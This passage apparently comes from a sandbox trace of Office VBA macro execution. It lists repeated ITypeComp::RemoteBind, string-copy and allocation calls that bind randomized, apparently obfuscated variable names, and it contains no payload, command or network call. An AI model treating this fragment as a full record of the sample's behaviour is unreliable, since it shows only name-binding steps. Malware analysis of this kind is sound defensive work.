ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf9a) returned 0x0 [0060.368] ITypeComp:RemoteBind (in: This=0x87cef08, szName="f8d0jqy", lHashVal=0x10c5f2, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf9a | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf9a) returned 0x0 [0060.368] CRetailMalloc_Alloc () returned 0x87fc638 [0060.368] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f03c2 | out: _Dst=0x87fc638) returned 0x0 [0060.368] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="vYx2jc8r", cchCount1=-1, lpString2="_B_var_f8d0jqy", cchCount2=-1) returned 3 [0060.369] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.369] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_f8d0jqy", lHashVal=0x10c976, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.369] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f03c2 | out: _Dst=0x345c9c) returned 0x0 [0060.369] CRetailMalloc_Free () returned 0x6b30301 [0060.369] ITypeComp:RemoteBind (in: This=0x87ce890, szName="cwlrM0", lHashVal=0x1056d6, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf9c | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf9c) returned 0x0 [0060.369] ITypeComp:RemoteBind (in: This=0x87ce668, szName="cwlrM0", lHashVal=0x1056d6, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf9c | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf9c) returned 0x0 [0060.370] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="cwlrM0", lHashVal=0x1056d6, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf9c | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf9c) returned 0x0 [0060.370] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="YMN8tr1U0", cchCount1=-1, lpString2="cwlrM0", cchCount2=-1) returned 3 [0060.373] ITypeComp:RemoteBind (in: This=0x87cef08, szName="cwlrM0", lHashVal=0x1056d6, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf9c | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf9c) returned 0x0 [0060.373] CRetailMalloc_Alloc () returned 0x87fc638 [0060.373] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x7, _Src=0x56f03e6 | out: _Dst=0x87fc638) returned 0x0 [0060.374] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.374] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_cwlrM0", lHashVal=0x10d17f, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.374] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x7, _Src=0x56f03e6 | out: _Dst=0x345c9c) returned 0x0 [0060.374] CRetailMalloc_Free () returned 0x6b30301 [0060.374] ITypeComp:RemoteBind (in: This=0x87ce890, szName="PvfXGI3", lHashVal=0x10c29b, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf9e | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xf9e) returned 0x0 [0060.374] ITypeComp:RemoteBind (in: This=0x87ce668, szName="PvfXGI3", lHashVal=0x10c29b, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf9e | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xf9e) returned 0x0 [0060.374] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="PvfXGI3", lHashVal=0x10c29b, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf9e | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xf9e) returned 0x0 [0060.375] ITypeComp:RemoteBind (in: This=0x87cef08, szName="PvfXGI3", lHashVal=0x10c29b, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf9e | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xf9e) returned 0x0 [0060.375] CRetailMalloc_Alloc () returned 0x87fc638 [0060.375] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f040a | out: _Dst=0x87fc638) returned 0x0 [0060.376] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.376] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_PvfXGI3", lHashVal=0x10c61f, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.376] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f040a | out: _Dst=0x345c9c) returned 0x0 [0060.376] CRetailMalloc_Free () returned 0x6b30301 [0060.376] ITypeComp:RemoteBind (in: This=0x87ce890, szName="oAyGkxf", lHashVal=0x1031cf, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfa0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfa0) returned 0x0 [0060.376] ITypeComp:RemoteBind (in: This=0x87ce668, szName="oAyGkxf", lHashVal=0x1031cf, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfa0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfa0) returned 0x0 [0060.376] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="oAyGkxf", lHashVal=0x1031cf, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfa0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfa0) returned 0x0 [0060.377] ITypeComp:RemoteBind (in: This=0x87cef08, szName="oAyGkxf", lHashVal=0x1031cf, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfa0 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfa0) returned 0x0 [0060.377] CRetailMalloc_Alloc () returned 0x87fc638 [0060.377] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f042e | out: _Dst=0x87fc638) returned 0x0 [0060.378] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.378] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_oAyGkxf", lHashVal=0x103553, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.378] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f042e | out: _Dst=0x345c9c) returned 0x0 [0060.378] CRetailMalloc_Free () returned 0x6b30301 [0060.378] ITypeComp:RemoteBind (in: This=0x87ce890, szName="Jm6To", lHashVal=0x104365, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfa2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfa2) returned 0x0 [0060.378] ITypeComp:RemoteBind (in: This=0x87ce668, szName="Jm6To", lHashVal=0x104365, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfa2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfa2) returned 0x0 [0060.378] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="Jm6To", lHashVal=0x104365, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfa2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfa2) returned 0x0 [0060.379] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Jm6To", lHashVal=0x104365, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfa2 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfa2) returned 0x0 [0060.379] CRetailMalloc_Alloc () returned 0x87fc638 [0060.379] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f0452 | out: _Dst=0x87fc638) returned 0x0 [0060.380] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.380] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Jm6To", lHashVal=0x100752, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.380] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f0452 | out: _Dst=0x345c9c) returned 0x0 [0060.380] CRetailMalloc_Free () returned 0x6b30301 [0060.380] ITypeComp:RemoteBind (in: This=0x87ce890, szName="xwfZJMgz", lHashVal=0x106e55, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfa4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfa4) returned 0x0 [0060.380] ITypeComp:RemoteBind (in: This=0x87ce668, szName="xwfZJMgz", lHashVal=0x106e55, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfa4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfa4) returned 0x0 [0060.380] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="xwfZJMgz", lHashVal=0x106e55, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfa4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfa4) returned 0x0 [0060.381] ITypeComp:RemoteBind (in: This=0x87cef08, szName="xwfZJMgz", lHashVal=0x106e55, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfa4 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfa4) returned 0x0 [0060.381] CRetailMalloc_Alloc () returned 0x87fc638 [0060.381] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f0476 | out: _Dst=0x87fc638) returned 0x0 [0060.382] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.382] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_xwfZJMgz", lHashVal=0x1045de, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.382] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f0476 | out: _Dst=0x345c9c) returned 0x0 [0060.382] CRetailMalloc_Free () returned 0x6b30301 [0060.382] ITypeComp:RemoteBind (in: This=0x87ce890, szName="Vzm2oxl0a", lHashVal=0x10bd96, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfa6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfa6) returned 0x0 [0060.382] ITypeComp:RemoteBind (in: This=0x87ce668, szName="Vzm2oxl0a", lHashVal=0x10bd96, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfa6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfa6) returned 0x0 [0060.382] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="Vzm2oxl0a", lHashVal=0x10bd96, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfa6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfa6) returned 0x0 [0060.383] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Vzm2oxl0a", lHashVal=0x10bd96, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfa6 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfa6) returned 0x0 [0060.383] CRetailMalloc_Alloc () returned 0x87504e0 [0060.383] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x56f049e | out: _Dst=0x87504e0) returned 0x0 [0060.383] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="y6HFREyKe", cchCount1=-1, lpString2="_B_var_Vzm2oxl0a", cchCount2=-1) returned 3 [0060.384] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.384] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Vzm2oxl0a", lHashVal=0x10c6db, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.384] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0xa, _Src=0x56f049e | out: _Dst=0x345c9c) returned 0x0 [0060.384] CRetailMalloc_Free () returned 0xb820401 [0060.384] ITypeComp:RemoteBind (in: This=0x87ce890, szName="o2WsTtc", lHashVal=0x10f2a1, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfa8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfa8) returned 0x0 [0060.384] ITypeComp:RemoteBind (in: This=0x87ce668, szName="o2WsTtc", lHashVal=0x10f2a1, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfa8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfa8) returned 0x0 [0060.385] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="o2WsTtc", lHashVal=0x10f2a1, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfa8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfa8) returned 0x0 [0060.385] ITypeComp:RemoteBind (in: This=0x87cef08, szName="o2WsTtc", lHashVal=0x10f2a1, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfa8 | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfa8) returned 0x0 [0060.385] CRetailMalloc_Alloc () returned 0x87fc638 [0060.385] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x8, _Src=0x56f04c6 | out: _Dst=0x87fc638) returned 0x0 [0060.386] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.386] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_o2WsTtc", lHashVal=0x10e6a4, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.386] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x8, _Src=0x56f04c6 | out: _Dst=0x345c9c) returned 0x0 [0060.386] CRetailMalloc_Free () returned 0x6b30301 [0060.386] ITypeComp:RemoteBind (in: This=0x87ce890, szName="emLRf", lHashVal=0x10df34, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfaa | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfaa) returned 0x0 [0060.386] ITypeComp:RemoteBind (in: This=0x87ce668, szName="emLRf", lHashVal=0x10df34, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfaa | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfaa) returned 0x0 [0060.387] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="emLRf", lHashVal=0x10df34, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfaa | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfaa) returned 0x0 [0060.387] ITypeComp:RemoteBind (in: This=0x87cef08, szName="emLRf", lHashVal=0x10df34, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfaa | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfaa) returned 0x0 [0060.387] CRetailMalloc_Alloc () returned 0x87fc638 [0060.387] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x6, _Src=0x56f04ea | out: _Dst=0x87fc638) returned 0x0 [0060.388] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.388] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_emLRf", lHashVal=0x10a321, wFlags=0x5, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.388] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x6, _Src=0x56f04ea | out: _Dst=0x345c9c) returned 0x0 [0060.388] CRetailMalloc_Free () returned 0x6b30301 [0060.388] ITypeComp:RemoteBind (in: This=0x87ce890, szName="aKy9dqcO", lHashVal=0x10d046, wFlags=0x3, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfac | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfac) returned 0x0 [0060.388] ITypeComp:RemoteBind (in: This=0x87ce668, szName="aKy9dqcO", lHashVal=0x10d046, wFlags=0x3, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfac | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfac) returned 0x0 [0060.389] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="aKy9dqcO", lHashVal=0x10d046, wFlags=0x3, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfac | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfac) returned 0x0 [0060.389] ITypeComp:RemoteBind (in: This=0x87cef08, szName="aKy9dqcO", lHashVal=0x10d046, wFlags=0x3, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfac | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfac) returned 0x0 [0060.389] CRetailMalloc_Alloc () returned 0x87fc638 [0060.389] _mbscpy_s (in: _Dst=0x87fc638, _DstSizeInBytes=0x9, _Src=0x56f050e | out: _Dst=0x87fc638) returned 0x0 [0060.390] IUnknown:Release (This=0x87ce888) returned 0x5 [0060.390] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_aKy9dqcO", lHashVal=0x10a7cf, wFlags=0x3, ppTInfo=0x345c00, pDescKind=0x345c10, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90, pDummy=0x1 | out: ppTInfo=0x345c00*=0x0, pDescKind=0x345c10*=0, ppFuncDesc=0x345c04, ppVarDesc=0x884dc24, ppTypeComp=0x345d90*=0x0, pDummy=0x1) returned 0x0 [0060.390] _mbscpy_s (in: _Dst=0x345c9c, _DstSizeInBytes=0x9, _Src=0x56f050e | out: _Dst=0x345c9c) returned 0x0 [0060.390] CRetailMalloc_Free () returned 0x6b30301 [0060.390] ITypeComp:RemoteBind (in: This=0x87ce890, szName="ubhqMnsVp", lHashVal=0x10c945, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfae | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x0, pDummy=0xfae) returned 0x0 [0060.390] ITypeComp:RemoteBind (in: This=0x87ce668, szName="ubhqMnsVp", lHashVal=0x10c945, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfae | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x1, pDummy=0xfae) returned 0x0 [0060.390] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="ubhqMnsVp", lHashVal=0x10c945, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfae | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x2, pDummy=0xfae) returned 0x0 [0060.391] ITypeComp:RemoteBind (in: This=0x87cef08, szName="ubhqMnsVp", lHashVal=0x10c945, wFlags=0x5, ppTInfo=0x345bf0, pDescKind=0x345c00, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, ppTypeComp=0x4, pDummy=0xfae | out: ppTInfo=0x345bf0*=0x0, pDescKind=0x345c00*=0, ppFuncDesc=0x345bf4, ppVarDesc=0x345d90, 